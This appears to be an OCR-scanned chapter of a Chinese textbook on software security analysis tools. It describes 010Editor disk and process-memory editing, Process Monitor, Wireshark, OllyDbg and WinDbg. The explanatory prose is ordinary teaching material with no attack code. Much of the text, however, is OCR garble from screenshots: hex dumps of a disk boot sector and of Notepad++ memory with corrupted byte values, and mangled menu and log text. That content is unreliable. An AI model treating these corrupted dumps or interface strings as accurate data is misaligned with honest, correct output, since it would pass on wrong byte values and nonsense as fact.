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盘 文 件 格式 ,比如 分 区 表 文件 系统 ,通过 磁盘 编辑 可 以 发 现 隐藏 文件 .已 删除 文件 的 历史 
痕迹 ,甚至 进行 文件 恢复 等 操作 。 磁 盘 编 辑 具 有 一 定 的 风险 ,编辑 出 错 可 能 误 删 数据 , 建 
议 使 用 之 前 先 备 份 数据 。 图 3-22 为 读 取 的 U 盘 数 据 和 硬盘 数据 ,可 以 获悉 磁盘 的 格式 
分 别 为 FAT32 fl NTFS, 


Deive J: (USP DISE) 
š ätas: 














21567 ABCPEIE 
X8 88 90 4D 53 44 4F 53 35 2E 30 00 02 20 50 25 
02 00 00 00 00 Fe 00 0D 3F 00 80 OO *O IF 00 00 












20 20 20 00 02 08 00 00 


vocem: zs sz so EEEEEDEEE > 





oii 00 09 00 09 GO FE G0 00 3F 00 TF 09 00 28 03 00 
80 60 D8 01 B6 1D 00 00 00 00 CO OO O2 00 00 00 0020n: 06 00 00 00 #0 CO mo OO FF CF 1F 15 00 00 OO 00 
jf 01 00 OS 00 50 68 49 73 4F 6E O0 OO OO OO 00 00 0030n; 0€ 00 OC 00 00 00 00 00 02 00 00 00 CO O0 O0 00 
: 00 01 29 30 1E 03 DO 55 53 42 20 44 49 53 4B 20 0040h: F6 00 00 00 01 OO OO DO F2 77 F2 BA 92 F2 BA CC 
2 2 ENBEIEENE 2° 20 20 numen bosom; 06 09 09 00 FA 33 Ct SE D0 Bc 
: TB BE Ci BE D9 BD OO 7C 88 4E 02 BA 56 40 B4 OB  (: 1'N.SV8'. 0060h: 1F 1E 68 66 00 CB B8 16 OE 00 
j CD 13 73 05 B9 FF FF 8A Fi 66 OF Bé CE 40 66 OF 1.5.:]958f.129f. | 0070h:| 54 46 53 75 15 B4 41 SB AA 55 
i: B6 DL 80 E2 3F F7 F2 R6 CD CO ED 06 41 66 OF B7  WiüeA2-AriÀt ^  0080h; 55 AA 75 06 F7 Ci O1 00 75 03 
1 C3 66 P7 Ei c6 39 16 PO 83 "b 14 00 76 36 99 7E Face 
2A 0077 salas sm «e lc ee w3 CO OC mm 00 aD as pe EXGOXOOEGOEJCIZ 
1 01 09 zo 28 00 £3 18 03 A0 TA ID B4 7D SB FO RC | (tv. ————— 
84 CO 74 17 3C FF 74 09 B4 OE EB 07 OO CD 10 EB | ,Àc.«jt. oocon: 6€ FF 06 11 00 C3 16 OF 00 0E 
i EE AD FB b EB tS A0 r9 7D EB EO 98 CD 16 CD 19 e Xo OEO 
2 66 CO cG 28 46 Fe OF 82 JA 00 64 €A 00 6€ S0 06 Qosoni| 9€ 01 70/34 43 30 41 78 20 81 
CE CI EEE E- OEEO 
2 41833 25 GA 96 40 CO 13 OF G2 IC 00 8i PB 38 eed Ss 1e 1e 16 es Ba Di 65/6) ot 
AA OF 29 14 00 F6 Cl 0 07 e4 OD 00 FE 4€ 02 S4 E EEOC 
42 OA 56 40 BB F4 CD 13 BO F9 66 58 66 58 66 5^ 0120h: 0€ 66 Al 11 00 €6 O3 06 1C 00 1E 66 €8 00 00 00 
$6 $8 EB 2A 66 33 D2 66 OP B7 «b 18 66 Olson: 00 e 30 09 33 et 01 00 85 19 09 B4 42 SA 16 0E 
C2 AA CA 66 8B DO 66 C1 EA 10 F7 76 1A 0140h; OC 1€ 1F 8B F4 CD 13 66 55 58 SA 66 59 66 59 1F 
2 E6 40 oA Ed CO P4 oc 9A CC Be 0 oa cp Sisen] or a2 16 00|c6 PF Oc 13 00 0b 16 OP 0o EE CA TT 
OE 2 SA FF BI C3 00 02 96 40 49 Or 88 71 FF C3 bisons OE 16 09 75 BC OT 1F 8€ Si C) Al P8 qi PN D$ 00 





: AE 54 4C 44 52 20 20 20 20 20 20 00 00 00 00 00 
00 00 00 00 C0 DO 00 0D 00 00 O0 00 00 00 00 00 
1 00 00 00 00 00 00 00 0D 00 00 O0 O0 OO 00 00 00 
00 00 00 00 00 20 00 0D 00 00 00 00 OD oA 52 65 
6D 6F 76 65 20 54 69 73 6B 73 20 6F 72 20 6F 74 
3 68 65 72 20 6D 65 64 69 61 2E FF OD OA 44 69 73 

20 6$ 72 72 6F 72 FF OD OA $0 72 65 73 73 20 
: 6L E 79 20 €B 65 79 20 74 6T 20 72 65 73 74 61 
1.72 74 0D OA 00 00 00 00 00 AC CB De 00 00 55 AA 


0170h: Al FA Ol ES 03 CO F4 EB FD 8B FO AC 3C CO 74 09 
Olson: B4 OE B8 07 00 CD 10 EB F2 C3 0D 0A 41 20 64 69 
OiSOhi 73 6B 20 72 65 61 64 20 68 72 72 €T 72 20 6F 6$ 
OlAon: 63 75 72 72 65 64 00 DD OR 42 4F 4F 54 4D 47 52 
OiBOh; 20 69 73 20 63 6F €D 70 72 65 73 73 65 64 O0 0D 
OLOR: OR 50 72 65 73 73 20 43 74 72 6C 28 41 6C 74 2B 
ormon: 44 65 67 20 74 6F 20 72 65 73 74 6172 74 OD OR 
oiEOh: 00 00 02 00 00 C0 O0 DO 00 0D 00 00 00 00 00 00 
orron: OC 00 02 09 00 00 ^A 01 A7 o1 BF 01 Q0 00 5* 


图 3-22 磁盘 编辑 








5. 进程 内 存 编辑 功能 

进程 内 存 编辑 也 是 010Editor 的 一 项 高 级 功能 ,普通 的 编辑 器 同样 不 具备 这 样 的 功 
能 ,通过 进程 管理 模块 可 以 获取 进程 列表 ,然后 选择 能 够 识别 的 进程 ,如 图 3-23 所 示 , 图 
中 选中 了 notepad++. exe 进程 ,软件 能 够 解析 出 堆 数 据 信 息 , 这 些 信息 包括 地 址 、 大 小 、 
状态 、 类 型 模块 等 ,通过 这 些 信息 能 够 获取 堆 内 存 是 否 可 读 、 是 否 可 写 、 是 否 被 释放 等 











Open Process EI 
toede. ee: 166 hope, 5 aediles d 
Pepe Diale] | 
Procese 10 ES = 
DD aaa E Fage sae Type Modde ^ 
En 00007761 0000h 1000h ——— MiReedWcte Committed ^ Image  notepad+ tese | 
€ 000 7761 1000h 3000h ——— Reed WoteC. CommiMed Image notepad: + ane 
ire Ed 0000 7761 4000h 27000h M Read Commined ^ image notepad- sere 
[rr E 000776380005 SQ Uralocmed Free notepad- s ee 
Ficus] ze oo00 77és0000h aoch ied Comnined Image wombat 
MAL 00007764100 — 30305 M Reed Comited mege wow64al | 
~ | 
ee ORE: bas 00007767 CO00n 2000h M ReedAWrte Committed Image 。 wow64al | 
nien d wj |0000 z7e7 coooh pooon M reed Committed 。 image  wowstdll ~ 





E Ortis 








Onea er [5 














图 3-23 Open Process 功能 


打开 进程 内 存 之 后 能 够 获得 图 3-24 所 示 转 储 出 来 的 内 存 数据 ,通过 字符 串 搜索 文本 
中 的 内 容 确 定 文本 内 容 在 内 存 中 的 位 置 ,发 现存 在 两 份 数据 ,修改 第 一 份 password 字段 ， 
保存 之 后 发 现 Notepad++ 显示 的 内 容 不 变 , 修 改 第 二 份 数据 ,保存 修改 之 后 , Notepad ++ 
显示 的 文本 内 容 发 生 了 变化 ,如 图 3-25 所 示 ,左右 两 张 图 分 别 为 修改 前 和 修改 后 的 对 比 
情况 。 
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FERE TR 

hello da 
ta password: 372 
83762. .ccc. .ddd. 
.today is 2015 1 
2 21..222222..*. 
M.n.e.w. . 
ECOSSE 
l 0 12 3 4 5 6 7 8 9 A B C D E F  0123456789ABCDEF 
15:6ES0h: 00 00 00 00 00 00 00 00 OO OO 00 00 53 74 00 O0 |. 

15:6E60h: 45 08 EA 10 00 OF 00 8F 68 65 6C 6C 6F 20 64 61 
15:6E70h:| 74 61 20 71 62 74 74 78 70 73 65 BA 20 33 37 32 | ta qbttxpsei 372 
15:6E80n: 38 33 37 36 32 OD OA 63 63 63 OD OA 64 64 64 OD | 83762..ccc..ddd. 
15:6E90h: OA 74 6F 64 61 79 20 69 73 20 32 30 31 35 20 31 | .today is 2015 1 
15:6EA0h: 32 20 32 31 OD OA 32 32 32 32 32 32 0D OA 2B 00 | 2 21..222222 
15:6EBOh: SC 00 6E 00 65 00 77 00 20 00 20 00 30 00 00 00 | V.n.e.w. . . 
15:6ECOh: 51 08 96 10 00 10 00 8F 00 00 00 00 00 00 00 OO | Q......... 




















文件 (站 RE 搜索 (S) 视图 (V) 格式 (M) 语 高 (W GEO XHA SAE RRS 视图 (V) 格式 (M) GENE) iE) 
EO) 运行 (R) MHP) SOW ? RO 运行 (R】 MHP BOW ? 
APICES TT 


| 37283762 hello data |: 37283762 
SSS zm 
daa - 

today is 2015 12 21 today is 2015 12 21 

222222 222222 




















图 3-25 内 存 被 修改 前 后 变化 比较 


另外 ,010Editor 提取 的 内 存 数据 具有 时 效 性 , 随 着 进程 的 执行 ,内 存 中 的 数据 会 发 生变 
化 ,编辑 器 显示 的 数据 虽然 有 一 定 延 迟 ,但 可 以 进行 刷新 。 例 如 ,关闭 软件 一 段 时 间 后 ,刷新 
编辑 器 显示 的 数据 ,可 以 看 到 之 前 分 析 的 文件 数据 所 处 内 存 数据 均 被 清 零 ,如 图 3-26 所 示 。 


Process: notepad**. exe (7808) 国 | 
* Edit As: Process v Run Script * Run Template Y 

012 3 4 5 6 7 8 9 A B C D E F  0123456789ABCDEF 
15:6E50h:| 00 00 00 00 00 00 00 00 00 OO OO 00 00 OO 00 00 
15:6E60h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
15:6E70h: Do 00 00 00 00 00 00 00/00 00 00 00 OO OO OO 00 
15:6E80h: 00 00 00 00 00 00 OO OO OO OO OO OO OO OO 00 00 
15:6E90h: | 00 00 00 00 00 00 OO OO 00 OO OO OO OO OO OO 00 
15:6EA0h: 00 00 00 00 00 00 OO 00 OO OO OO OO OO OO OO 00 
15:6EBOh:| 00 00 00 OO 00 00 OO OO OO 00 OO OO 00 OO OO 00 
15:6ECOh:| 00 00 00 00 00 OO OO OO OO OO OO OO OO OO 00 OO 


图 3-26 内存 数据 刷新 














010Editor 是 一 款 功 能 齐全 的 文件 编辑 器 ,不 仅 支 持 文本 文件 和 二 进 制 文件 的 编辑 ， 
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还 具备 磁盘 编辑 、 进 程 内 存 编辑 的 能 力 ,此 外 还 支持 文件 格式 的 范本 分 析 , 支 持 脚本 分 析 ， 
这 在 一 定 程度 上 提高 了 分 析 能 力 和 分 析 效 率 。 相 关 软 件 和 更 多 内 容 可 以 从 SweetScape 
官方 网 站 http://www. sweetscape. com 获取 , 范本 下 载 地 址 是 http://www. 
sweetscape. com/010editor/templates/ 。 类 似 的 工具 还 有 WinHex, 相 关 资 料 详 见 官方 网 
站 http://www. winhex. com/winhex/。 


3.2 动态 分 析 工 具 


动态 分 析 是 指 在 可 控 环 境 中 运行 软件 程序 或 者 模拟 软件 执行 的 情况 下 ,利用 分 析 工 
具 , 监 控 代 码 的 所 有 操作 ,观察 代码 执行 流程 及 状态 ,获取 执行 过 程 中 的 各 种 数据 。 动 态 
分 析 的 优势 在 于 能 够 获取 程序 的 真正 行为 ,不 受 加 过 保护 的 影响 ,并 能 获取 指令 代码 执行 
过 程 中 各 个 操作 数 的 具体 值 ,提供 比 静 态 分 析 更 充足 的 分 析 数 据 。 当 前 学 术 界 与 工业 界 
已 有 大 量 的 动态 分 析 工 具 , 可 分 为 外 部 观测 类 和 跟踪 调试 类 。 其 中 常见 的 外 部 观测 类 工 
具 包 括 ProcessMonitor, Wireshark 等 ,这 类 监测 工具 能 够 从 宏观 层面 上 了 解 软件 行为 及 
动向 ;而 常见 的 调试 跟踪 类 工具 包括 OllyDbg, WinDbg, Pin, Valgrind, DynamoRIO 等 ， 
这 类 工具 可 在 指令 层面 对 程序 进行 分 析 , 定 位 软件 异常 指令 位 置 .异常 类 型 等 。 





321 Process Monitor 


Process Monitor 是 一 款 Windows 平台 下 的 进程 监控 工具 ,主要 用 于 进程 行为 监控 与 记 
录 , 包 括 文件 操作 行为 ,注册 表 操作 行为 .网 络 行为 等 。 安 全 分 析 人 员 根 据 观察 到 的 系统 状 
况 和 软件 行为 ,可 以 分 析 系 统 是 否 发 生 了 异常 ,或 者 运行 中 软件 是 否 存 在 隐藏 操作 等 恶意 行 
为 。 该 工具 由 微软 公司 的 Windows Sysinternals 开发 和 维护 ,支持 Windows XP SP2 及 以 上 
版 本 的 32 位 和 64 位 系统 。Process Monitor 综合 了 进程 管理 器 、Filemon( 文 件 监控 工具 )、 
Regmon( 注 册 表 监控 工具 ) , TepView (网 络 监控 工具 ) 的 功能 ,以 下 分 别 具 体 介绍 。 

1. 进程 监控 功能 

进程 监控 管理 是 系统 监控 所 需 具备 的 一 项 基本 功能 , Process Monitor 集成 了 
Process Tree 工具 进行 系统 进程 监控 管理 。 如 图 3-27 所 示 ,进程 监控 管理 用 报表 的 形式 
列 出 了 系统 运行 过 的 和 正在 运行 的 进程 ,并 以 父子 关系 的 进程 树 形式 进行 展示 。 与 其 他 
进程 管理 器 相 比 ,该 工具 的 特点 是 能 够 获取 已 退出 的 进程 信息 ,并 以 虚 影 的 形式 标记 , 选 
中 该 进程 ,下 方 会 显示 进程 的 描述 、 程 序 的 开发 公司 程序 路 径 、 启 动 命令 、 用 户 、PID, 开 
始 时 间 以 及 退出 时 间 。 报 表 的 Life Time 一 列 用 颜色 标记 了 进程 的 生命 周期 。 

如 果 用 户 只 关心 运行 中 的 进程 ,可 以 选择 最 上 方 的 Only show processes still 
running at end of current trace( 只 显示 最 近 仍 在 运行 的 进程 ) 复 选 框 进行 过 滤 , 减 少 分 析 
的 数据 量 。 笔 者 使 用 OpenOffice 打开 xls 格式 的 文件 ,将 进程 树 进行 缩合 ,并 选择 上 述 复 
选 框 ,能 够 快速 从 大 量 进程 中 发 现 OpenOffice 对 应 的 进程 ,如 图 3-28 所 示 , 软 件 的 scale 
. exe 进程 首先 启动 ,然后 启动 子 进程 soffice. exe, 最 后 启动 孙子 进程 soffice. bin。 分 析 发 
现 ,启动 soffice. bin 之 后 ,再 使 用 OpenOffice 打开 另 一 个 doc 文档 不 会 产生 新 进程 ,而 是 
使 用 旧 的 soffice. bin 进程 打开 文档 ,这 一 点 可 以 结合 后 面 的 文件 监控 功能 进行 验证 。 
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图 3-27 Process Monitor 进程 监控 管理 功能 
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图 3-28 OpenOffice 进程 分 析 


2. 文件 监控 功能 
Filemon 是 典型 的 文件 监控 工具 ,Process Monitor 集成 了 Filemon 的 功能 ,能 够 监控 


文件 的 打开 、 读 
字 节 数 等 参数 。 
的 报告 。 


\ 写 、 关 闭 等 操作 ,同时 获取 操作 是 否 成 功 的 状态 、 文 件 路 径 、 读 写 偏 移 量 、 
图 3-29 为 文件 监控 功能 。 注 意 在 工具 栏 中 关闭 网 络 、 注 册 表 和 其 他 事件 


监控 报表 记录 了 事件 的 时 间 、 事 件 对 应 的 进程 名 、 进 程 ID(PID) ,操作 行为 (打开 、 读 、 
写 、 关 闭 等 ) ,行为 操作 的 路 径 ( 文 件 路 径 ) ,操作 事件 的 状态 (成 功 或 者 失败 原因 ) 以 及 其 他 
一 些 细节 信息 ( 读 文件 的 偏 移 位 置 , 读 取 长 度 等 )。 结 合 报表 过 滤 功 能 ,可 以 筛选 出 所 有 的 


读 文件 操作 ,如 





图 3-30 所 示 , 设 置 Operation is ReadFile, 发 现 了 打开 doc 文件 的 是 之 前 


打开 xls 文件 的 进程 soffice. bin, 进 程 PID 都 是 5720。 关 于 哪个 进程 .用 哪些 API 去 打开 
文件 和 读 文件 、 从 哪个 偏 移 位 置 读 了 多 少 字 节 等 信息 在 污点 传播 里 被 广泛 应 用 ,笔者 所 在 
团队 开发 的 污点 源 标记 功能 模块 通过 这 些 信息 进行 辅助 验证 。 


第 3 章 ， 软 件 安全 分 析 基础 工具 Ve 





File Edit Event Fiter Tools Options Helo 
CIEN N: EEL] 











Tine of Pay Prosess Feme " Deer 
LO dT qose a yes Fess 

.4:47 sorte 和 n 

Lb H4T 3220576 E E m peine ee 
pur de 


arre 
aries 4 
resen. use 


E Wrerstbrt cx aniteta oen 

E WsarsWrl x agita ta Vonn ine Opec: 

E Wsersturlcxtapstefa Minna Opec; ce aser IPSE. Up 

E Wserstial x patuta Mount Opec ice aser E. tag m. 

E Weerstrtcxtapstefa innt Opec; ce aser LE, G0 16,54, Lengt 

E Wserstal vga ta Sonning Opec Cice aser (6E. tag 20,400, ruit 

enet antera Nonnita mcr uer AT t 20,40, Leeth, 
SIS, Leath 








图 3-29 Process Monitor 文件 监控 
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图 3-30 过 滤 读 文件 操作 


3. 注册 表 监 控 

Regmon 是 典型 的 注册 表 监 控 工具 ,Process Monitor 集成 了 Regmon 的 功能 ,能 够 监 
控 注册 表 的 创建 ,打开 、 读 、 写 、 关 闭 等 操作 ,同时 获取 操作 是 否 成 功 的 状态 、 注 册 表 路 径 、 
访问 类 型 长度 等 参数 。 图 3-31 为 注册 表 监 控 功 能 ,注意 在 工具 栏 中 关闭 文件 .网 络 和 其 
他 事件 的 报告 

监控 报表 记录 了 事件 的 时 间 、 事 件 对 应 的 进程 名 、 进 程 D ARETA GTA 
闭 等 ) ,行为 操作 的 路 径 ( 注 册 表 键 ) .操作 事件 的 状态 (成 功 或 者 失败 原因 ) 以 及 其 他 更 多 
细节 信息 (长 度 、 读 访问 、 查 询 值 等 )。 结 合 报表 过 滤 功 能 ,可 以 筛选 出 指定 进程 .指定 注册 
表 键 操作 的 记录 。 例 如 ,图 3-32 中 筛选 出 了 操作 注册 表 键 名 包含 soffice 字段 的 所 有 操 
作 , 通 过 过 滤 能 够 有 效 降低 信息 量 的 规模 。 

4. 网 络 监控 

TcpView 是 典型 的 网 络 端口 监控 工具 ,Process Monitor 集成 了 TcpView 的 功能 ,能 
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图 3-31 Process Monitor 注册 表 监 控 
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图 3-32 注册 表 键 过 滤 


够 监控 网 络 数据 的 发 送 与 接收 操作 、 协 议 类 型 ,同时 获取 操作 的 进程 名 、PID、 是 否 成 功 的 
状态 、 连 接 方 的 地 址 和 端口 . 报 文 长 度 等 参数 。 图 3-33 为 网 络 监控 功能 ,注意 在 工具 栏 中 
关闭 文件 .注册 表 和 其 他 事件 的 报告 ,避免 过 多 数据 的 干扰 。 

Process Monitor 是 功能 齐全 的 进程 行为 实时 监控 工具 ,同时 具备 监控 和 记录 存储 的 
功能 ,支持 文件 ,注册 表 、 网 络 线程 等 各 类 行为 的 监控 ,并 以 报表 形式 展示 监控 结果 ,丰富 
的 过 滤 功 能 为 分 析 带 来 了 便利 。 相 关 软 件 和 更 多 资料 可 从 微软 公司 官方 网 站 https:// 
technet. microsoft. com/en-us/sysinternals/bb896645 获取 。 


322 Wireshark 


Wireshark 是 一 款 开源 的 网 络 数据 包 采 集 与 分 析 软 件 ,具备 数据 包 采 集 和 数据 报 文 
协议 解析 的 能 力 。Wireshark 是 由 Gerald Combs 研发 的 软件 ,于 1998 年 发 布 第 一 个 版 
本 Ethereal,2006 年 更 名 为 Wireshark, 支 持 32 位 和 64 位 的 Windows、Linux、Mac OS 操 
作 系 统 。 以 下 介绍 其 具体 功能 。 

1. 流量 采集 功能 

Wireshark 的 流量 采集 功能 通过 Capture 菜单 的 Option 选项 进行 设置 ,设置 要 采集 
的 网 卡 (可 多 个 ) ,设置 过 滤 规 则 ,可 以 指定 协议 、IP 地 址 、 端 口号 等 ,条 件 可 通过 逻辑 符号 
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图 3-33 网 络 监控 功能 


11、&& 进行 组 合 ,如 图 3-34 所 示 , 其 中 的 配置 表明 将 捕获 与 192. 168. 10. 90 这 个 IP HE 
行 通信 的 TCP 或 者 UDP 数据 包 , 并 将 采集 的 数据 存储 到 D: N brich \ wireshark \ 
dumpcap. pcap 文件 中 。 
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图 3-34 Wireshark 流量 采集 设置 
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2. 协议 分 析 功 能 

Wireshark 的 协议 分 析 功 能 可 以 分 析 实 时 采集 的 数据 ,也 可 以 分 析 离 线 存 储 的 数据 
包 , 协 议 分 析 支 持 网 络 层 的 IP、IPv6 ,支持 传输 层 的 TCP、UDP, 支 持 应 用 层 的 HTTP. 
FTP,POP3,SMTP 等 已 知 协议 ,另外 还 支持 IPSec, SSL, TLS, HTTPS 等 安全 协议 。 如 
图 3-35 所 示 ,Wireshark 提取 的 数据 报 文 信息 包括 时 间 、 源 IP 地 址 .目的 TP 地 址 .协议 类 
型 . 报 文 长 度 等 数据 ,中 间 可 选 定 具体 的 报 文 查看 指定 报 文字 段 的 信息 ,如 端口 号 、TCP 
报 文 序号 、 校 验 和 等 ,最 下 方 是 报 文 的 十 六 进 制 编码 内 容 。 


4 dumppcep.pcap [Wireshark 1.10.1 (SVN Rev 50926 from /trunk-1.10)] -cEm 
Ble Edt View Go Capure areyre Saisics Telephony Took Iwemals Heip 
eesmalsnhxgite9oTi «aeanigszmex B 


Fior 





























ear Apply Save 
No i Length. Info, ^ 
45.32.11.91 54 61728 > https [ACK] seq-263 Ack-77 win-66304 Len-0 
192.165.10.90 3 123 encrypted nandshake message 

32.31.91 60 change Cipher Spec 
123 encrypted Handshake message 
363 Application Data. 





15 EJ J 
139 14.8328150 123. 151.40.165 192.168.10.90 135 continuation Data 
140 14. 8838750 192. 168. 10, 90. 123.151.40.165 54 5129 > https [ACK] Seq=1 Ack=163 winr255 Lenr0 
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E Transats ton control Protocol, src Port: https (643), Ot Pòrt: C4729 (4723). Seq. 148, AK: GT, Len: O 
Source port: https (443) 
Destination port: 64729 (64729) 
[stream index: 14) 
Sequence rumber: 146 (relative sequence runder) 
Acknowledoment number: 647 — (relative ack number) 
Header length: 20 bytes 
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Window size value: 245 
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[window size scaling factor: 128] 
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图 3-35 Wireshark 协议 分 析 


结合 报 文 的 发 送 顺 序 , 分 析 人 员 能 清晰 地 了 解 协议 工作 过 程 。 图 3-36 为 FTP 协议 工 
作 过 程 ,分 析 人 员 通 过 发 送 USER, PASS 进行 登录 ,发 送 opts utf8 .syst'site help 获取 系统 状 
态 信息 ,发 送 PWD 获取 当前 路 径 , 发 送 PASV 设置 被 动 模式 ,发 送 LIST 获取 目录 这 一 系列 
的 过 程 完成 FTP 服务 器 的 访问 。 另 外 ,分 析 人 员 可 以 清晰 地 查看 每 次 应 答 的 内 容 、 格 式 。 

Wireshark 提供 了 流量 采集 、 网 络 数据 协议 分 析 , 但 无 法 将 数据 包 与 具体 的 进程 进行 
关联 。 使 用 过 程 中 可 结合 Process Monitor 的 网 络 监控 功能 ,定位 目标 程序 开启 的 连接 
IP 和 端口 ,然后 结合 Wireshark 的 过 滤 功 能 采集 目标 进程 的 数据 ,排除 无 关 进 程 数据 包 
的 干扰 。 关 于 Wireshark 的 软件 和 更 多 资料 可 从 Wireshark 官方 网 站 https://www. 
wireshark. org/ 下 载 。 


323 OlyDbg 
OllyDbg 是 一 款 Windows 平台 反 汇 编 动态 调试 追踪 工具 ,只 支持 Ring 级 别 的 用 户 
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192.168.10.101 192.168.10.90 FTP 26 Response: 331 Anonymous access allowed, send identity (e-mail name) as passw 


192.166.10.101 192.168.10.90 FTP 75 Response: 230 User logged in. 


192.1658.10.101 I97.108.10.90 FTP 112 Response: 200 OPTS UTFS command successful - UTFS encoding now ON. 


192.168.10.101. 192.168.10.90 


3 


70 Response: 215 windows NT. 


192.168.10.101 192.168.10.90 FTP 127 Response: 214-The following SITE commands are recognized (* ==>"s uninplemer 
192.168.10.10) 192.168.10.90 Fp 59Response:  DIRSTYLE 
192.168.10.101 192.168.10.90 FT 65 Response: HELP 

FTP 


192.168.10.101 192.168.10.90 84 Response: 214 HELP command successful. 


192.168.10.101 192.165.10.90 FTP 85 Response: 257 "/" is current directory. 





192.168.10.101 77 192.168.10.90 FTP 74 Response: 200 Type set to A. 
HLPA PL a TE 
192.168.10.101 192.168.10.90 Ga 106 Response: 227 Entering Passive Mode (192,168,10,101,192,15). 

52. 168. 10. 90 192.168.10.101 FTP LIST 

192.168.10.101 192. 108. 10. 90 FP 108 Response: 175 Data connection already open; Transfer starting 
192.168.10.101 192.168.10.90 FI 78 Response: 226 Transfer complete. 


图 3-36 Wireshark 分 析 FTP 协议 流程 


态 程序 。OllyDbg 是 由 Oleh Yuschuk 发 布 的 共享 软件 ,最 初版 本 发 布 于 2000 年 ,截至 
2013 年 更 新 到 2. 0. 1 版 本 ,支持 32 位 的 各 Windows 版 本 操作 系统 , 且 仍 在 持续 更 新 中 。 


1. 调试 功能 
OllyDbg 主要 应 用 在 应 用 软件 调试 领域 ,可 启动 新 进程 进行 调试 或 者 附加 到 运行 中 





的 进程 进行 调试 。 在 调试 过 程 中 能 够 提供 指令 内存、 寄存 器 、 栈 等 基本 信息 ,如 图 3-37 
所 示 ,OllyDbg 有 多 个 窗口 ,按照 编号 顺序 分 别 为 代码 窗口 .寄存 器 窗口 .十 六 进 制 内 存 数 
据 窗口 , 栈 数 据 窗口 。 代 码 窗 口 显示 代码 所 处 内 存 位 置 指 令 机 器 码 ,汇编 代码 这 些 信息 ; 
寄存 器 窗口 显示 的 是 CPU 通用 寄存 器 、 标 记 位 寄存 器 、 浮 点 数 寄存 器 当前 值 信息 ;十 六 
进 制 内 存 数据 窗口 可 以 获取 指定 位 置 内 存 的 数据 ,以 Hex 和 指定 编码 形式 显示 ; 栈 窗口 
显示 的 是 栈 空间 数据 , 栈 顶 0x0012FF8C 与 ESP 的 值 保 持 一 致 。OllyDbg 支持 命令 行 和 
快捷 键 的 操控 方式 ,支持 断 点 设置 . 单 步 执行 ,执行 到 return 暂停 等 方式 的 调试 。 
































图 3-37 OllyDbg 功能 界面 
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2. Trace 功能 

使 用 调试 功能 时 通常 会 碰 到 在 断 点 处 无 法 定位 入 口 的 情况 , 即 无 法 确定 前 序 执行 指 
令 , 通 过 Trace 功能 可 以 记录 调试 过 程 中 执行 的 指令 ,用 于 分 析 前 序 执行 指令 。Trace 记 
录 可 选择 是 否 记 录 寄 存 器 的 值 , 图 3-38 为 记录 的 Trace 信息 ,可 以 设置 存储 路 径 将 Trace 
存储 到 文件 中 。 然 而 Trace 记录 的 数据 非常 有 限 ,无 法 对 内 存 数据 进行 记录 ,无 法 满足 需 
要 内 存 值 进行 辅助 分 析 的 需求 。 















































图 3-38 OllyDbg 的 Trace 功能 


OllyDbg 具有 良好 的 操作 界面 ,容易 上 手 , 是 功能 齐全 的 调试 工具 ,同时 还 支持 Trace 
记录 功能 。OllyDbg 的 程序 和 更 多 资料 可 从 其 官方 网 站 http://www. ollydbg. de/ 获 取 。 
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WinDbg 也 是 一 款 Windows 平台 下 的 动态 调试 工具 ,由 微软 公司 发 布 ,目前 支持 
32 位 和 64 位 的 各 Windows 版 本 的 操作 系统 。 以 下 介绍 WinDbg 的 常用 功能 。 

1. 符号 功能 

WinDbg 主要 应 用 于 程序 调试 ,为 了 在 调试 过 程 中 获取 更 多 的 符号 语义 信息 ,通常 要 
先 设置 符号 服务 器 或 者 本 地 符号 文件 路 径 。WinDbg 的 主要 优势 在 于 结合 微软 公司 提供 
的 符号 库 能 获取 上 层 函 数 语义 信息 。 图 3-39 为 设置 符号 库 的 界面 。 

2. 调试 功能 

WinDbg 可 启动 新 进程 进行 调试 或 者 附加 到 运行 中 的 进程 进行 调试 ,调试 过 程 中 可 
获取 寄存 器 、 内 存 、 指 令 、 栈 、 模 块 等 信息 。 如 图 3-40 所 示 , WinDbg 界面 中 包括 命令 窗 
口 ` 反 汇编 窗口 .寄存 器 窗口 .内存 数据 窗口 .调用 栈 窗 口 等 。 命 令 窗 口 用 于 命令 交互 , 支 
持 调试 命令 和 信息 获取 与 配置 设置 多 种 命令 ; 反 汇 编 窗 口 显 示 指 令 地 址 、 机 器 码 、 汇 编 指 
今 信息 ;寄存 器 窗口 显示 CPU 各 个 寄存 器 的 值 ,除了 eax esp 这 些 通 用 寄存 器 外 ,还 有 浮 
点 指令 寄存 器 ST0、ST1, 多 媒体 指令 寄存 器 MMi、XMMi 以 及 标记 位 寄存 器 等 ;内 存 窗 
口 可 以 查看 指定 地 址 的 内 存 数据 ,以 Hex 的 形式 显示 结果 ;调用 栈 窗口 显示 当前 执行 指 
令 所 处 的 函数 栈 。WinDbg 支持 单 步调 试 、 断 点 调试 (内 存 断 点 、 软 件 断 点 、 硬 件 断 点 、 条 
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图 3-39 wWinDbg 符号 库 设 置 


件 断 点 等 ) .执行 到 函数 结束 等 方式 的 调试 方式 。 





Dx mp meom m- [Cx 

"001b 'a2-0023 -da-0023. ea-0029 fa-t020 ga-0000 "^ (rovina | met) 
Biel IR LEX teer Tbe - I Jí 

77£72886 egc23d0000 call ntdll!ZvTorninateThroad (77£7664c no. [oax],al 
70t etserqopteont eceetpompons exzognnon0y asisanonnnns pratis iu 
E MT REM EDT A cda cfEaet CharedÜsesData!GyotenCa. 
eax. 102b 
» le could not bo found. betaulted to export e: 
AT. ERROR Noduls load completed bat syabcls could not be loaded EAE | sbaredTsezData!SjstenCa 


Pid 658 - WinDbg:6. 8. 0004. 0 Pid 656 - FinDbg:6. 8. 0004,0 














?tta7000 
itéfffi 
17t7664d 


FT: 
2871 S is iii ai 
777571 00 03 ba 00 03 te Jt ti di 24 





"calls ~ Fid 666 — finDbg:6. 5. 0004. 0 





Lek ares usc info Sowrce Adirs Mesdings Nenvelatile regs Irane mz Source arge Mre Less 


ntdlliZwTernincteTarcad 
ntdllIRtlExi tUserTaread+0x13 
asdl11DbaUiRenctcBreakin+Dset1 





3-40 ”WinDbg 界面 


3. 命令 介绍 

WinDbg 的 命令 窗口 支持 命令 的 输入 ,通过 命令 可 以 完成 诸多 调试 分 析 功 能 ,包括 反 
汇编 ,内存 编辑 .内 存 搜索 . 断 点 设置 .符号 表 加 载 等 。 

反 汇 编 命令 可 以 快速 对 指定 的 内 存 数据 进行 反 汇编 ,在 命令 u 后 接地 址 参数 ,参数 也 
可 以 是 寄存 器 变量 .函数 符号 。 图 3-41 是 通过 反 汇 编 命令 快速 获取 NtCurrentTeb 函数 
的 上 下 文 代码 的 结果 。 在 命令 u 后面 加 eip 可 以 快速 获取 当前 指令 及 其 后 续 指 令 代码 ， 
